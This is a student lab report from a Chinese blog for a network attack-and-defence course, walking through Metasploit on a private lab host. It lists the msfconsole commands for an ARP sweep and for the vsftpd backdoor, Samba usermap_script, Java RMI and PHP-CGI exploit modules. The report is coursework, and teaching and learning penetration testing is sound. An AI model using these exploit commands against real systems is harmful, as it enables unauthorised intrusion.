首页 > 其他分享 >20222328 《网络与系统攻防技术》实验六实验报告

20222328 《网络与系统攻防技术》实验六实验报告

时间:2024-11-22 13:29:29浏览次数:1  
标签:arp 攻防 multi use 192.168 exploit 实验 实验报告 20222328

一.实验内容:本实践目标是掌握metasploit的用法。

二.实验过程:

1.首先打开msf,并搜索arp相关的指令

接下来我们需要用到use auxiliary/scanner/discovery/arp_sweep这个指令

随后指定攻击的ip地址,并开始用nmap进行端口扫描

2.输入use exploit/unix/ftp/vsftpd_234_backdoor进行攻击,payload需要指定RHOSTS

接下来就能看到攻击成功

3.use exploit/multi/samba/usermap_script
set RHOST 192.168.1.105
exploit

利用成功 执行uname–a验证

4.use exploit/multi/misc/java_rmi_server,随后用options查看需要设置什么东西

5.use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.1.105
exploit

标签:arp,攻防,multi,use,192.168,exploit,实验,实验报告,20222328
From: https://www.cnblogs.com/zyty/p/18562620

相关文章

  • [攻防世界]打野
    [攻防世界]打野解题得到一张bmp文件查看010,stegslove,暂时没啥发现看了wp,学到一个新工具———zsteg然后我一使用,出问题了(but之前写另外一个题目没问题)…………时隔多日,我又回来了如果zsteg出现栈报错“tackleveltoodeep(SystemStackError)”,可以将命令改成“zsteg......
  • [攻防世界]Pixel-Princess
    [攻防世界]Pixel-Princess解题下载得到一个压缩包一开始用winrar解压。得到一串jpg字符修改文件头发现没有,以为就是这么一个文件后面卡住时看一眼wp发现原来这就有一个图片,换成7Z之后能解压出来分离一下这个,得到MarioCastle.jpg得到一个密码:BaD_DR4G0N没错,就是卡在了......
  • WEB攻防-XSS跨站&反射型&存储型&DOM型&标签闭合&输入输出&JS代码解析
    XSS跨站-输入输出-原理&分类&闭合漏洞原理:接受输入数据(如前端JS代码进行执行),输出显示数据后解析执行(先分析,在输入,有闭合绕闭合,有过滤绕过滤)反射(非持续型攻击)有一些浏览器会阻止不确定用户会不会点击利用:可以制造一个钓鱼网站基础类型:反射(非持续),存储(持续),DOM......
  • 20222414 2024-2025-1《网络与系统攻防技术》实验五实验报告
    1.实验要求(1)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取如下信息:DNS注册人及联系方式该域名对应IP地址IP地址注册人及联系方式IP地址所在国家、城市和具体地理位置PS:使用whois、dig、nslookup、traceroute、以及各类在线和离线工具进行搜集信......
  • 20222307 2024-2025-1 《网络与系统攻防技术》实验六实验报告
    1.实验内容1.1本周学习内容回顾Metasploit是一个渗透测试框架,它提供了一个平台让安全专家能够开发、测试和执行漏洞利用代码。它包括了一个庞大的漏洞和漏洞利用数据库,以及许多用于辅助渗透测试的工具,如端口扫描器、漏洞扫描器和payload生成器1.2实验要求本实践目标是掌握met......
  • 20222415 2024-2025-1 《网络与系统攻防技术》实验六实验报告
    1.实验内容本周学习了metasploit的用法并趁热打铁做了一场痛彻心扉实践课。很好的实践题让我下六个虚拟机:)2.实验过程靶机IP172.16.230.80主机IP172.16.227.205(1)前期渗透Search一下,标白的地方就是等下要use的useauxiliary/scanner/discovery/arp_sweep然后输入show......
  • 攻防世界-easyupload
     打开环境有一个文件上传的界面 结合题目名字,这是一道木马上传的题目直接上传木马图片 给出回显“Yourfilelookswicked”,这说明了此处的文件上传存在过滤首先尝试修改一句话木马的构造<?php@eval($_POST['1']);?><?=eval($_POST['1']);?>利用直接利用短......
  • WEB攻防-PHP应用&文件包含&LFI&RFI&伪协议编码算法&无文件利用&黑白盒
    什么是文件包含1、原理程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为文件包含。在包含文件的过程中,如果文件能进行控制(如进行替换和修改),则存储文件包含漏洞白盒发现:在php代码中如果存......
  • #渗透测试#SRC漏洞挖掘#红蓝攻防#地址池搭建之Zmap安装使用
    免责声明本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章阅读。                            ......
  • 20222423 2024-2025-1 《网络与系统攻防技术》实验五实验报告
    1.实验内容1.2实验任务(1)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取如下信息:DNS注册人及联系方式该域名对应IP地址IP地址注册人及联系方式IP地址所在国家、城市和具体地理位置PS:使用whois、dig、nslookup、traceroute、以及各......